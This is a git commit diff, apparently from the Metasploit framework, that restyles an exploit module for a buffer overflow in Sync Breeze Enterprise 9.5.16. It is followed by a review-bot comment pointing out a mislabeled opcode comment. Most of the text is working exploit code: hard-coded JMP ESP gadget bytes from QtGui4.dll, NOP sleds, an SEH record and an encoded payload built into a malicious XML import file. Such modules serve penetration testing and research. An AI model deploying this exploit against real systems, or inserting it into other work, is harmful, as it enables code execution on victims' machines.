ninja style changes

bwatters-r7
2018-01-23 16:34:49 -06:00
parent 5fef8b43f6
commit 3922844650
@@ -12,14 +12,14 @@ class MetasploitModule < Msf::Exploit::Remote
def initialize(info = {})
super(update_info(info,
'Name' => 'Sync Breeze Enterprise 9.5.16 - Import Command Buffer Overflow',
'Description' => %q{
'Description' => %q(
This module exploits a buffer overflow in Sync Breeze Enterprise 9.5.16
by using the import command option to import a specially crafted xml file.
},
),
'License' => MSF_LICENSE,
'Author' =>
[
'Daniel Teixeira',
'Daniel Teixeira'
],
'References' =>
[
@@ -39,7 +39,7 @@ class MetasploitModule < Msf::Exploit::Remote
},
'Targets' =>
[
['Windows Universal', {'Ret' => 0x10015FFE } ],
['Windows Universal', { 'Ret' => 0x10015FFE } ]
],
'Privileged' => false,
'DisclosureDate' => 'Mar 29 2017',
@@ -49,28 +49,26 @@ class MetasploitModule < Msf::Exploit::Remote
[
OptString.new('FILENAME', [true, 'The file name.', 'msf.xml'])
])
end
def exploit
jmpesp= "\x7A\xB7\x1B\x65" #JMP ESP QtGui4.dll
esp = "\x8D\x44\x24\x4C" #LEA EAX, [ESP+76]
jmp = "\xFF\xE0" #JMP ESP
jmpesp = "\x7A\xB7\x1B\x65" # JMP ESP QtGui4.dll
esp = "\x8D\x44\x24\x4C" # LEA EAX, [ESP+76]
jmp = "\xFF\xE0" # JMP ESP
buffer = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<classify\nname=\'"
buffer << "\x90"*1536
buffer << "\x90" * 1536
buffer << jmpesp
buffer << "\x90"*18
buffer << "\x90" * 18
buffer << esp
buffer << jmp
buffer << "\x90"*68
buffer << "\x90" * 68
buffer << generate_seh_record(target.ret)
buffer << "\x90"*10
buffer << "\x90" * 10
buffer << payload.encoded
buffer << "\x90"*5000
buffer << "\x90" * 5000
buffer << "\n</classify>"
print_status("Creating '#{datastore['FILENAME']}' file ...")
file_create(buffer)
end
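Review bot: The comment on the `jmp` stub is wrong on the new side: `"\xFF\xE0"` encodes `JMP EAX`, not `JMP ESP`, which is exactly why it is preceded by `LEA EAX, [ESP+76]`; the comment should read `jmp = "\xFF\xE0" # JMP EAX (EAX = ESP+76 set by the LEA above)`. Since the commit is a style pass, this is also the moment to say where the version-specific bytes come from: `jmpesp` is a hard-coded address inside QtGui4.dll and `target.ret` is fixed at `0x10015FFE`, so a one-line comment noting that both are valid only for the shipped 9.5.16 binaries would save the next maintainer from reusing them against another build. The rendered page appears to have dropped the hunk's blank lines (the header counts 28/26 lines but fewer are shown), so the exact end of `exploit` is inferred rather than certain.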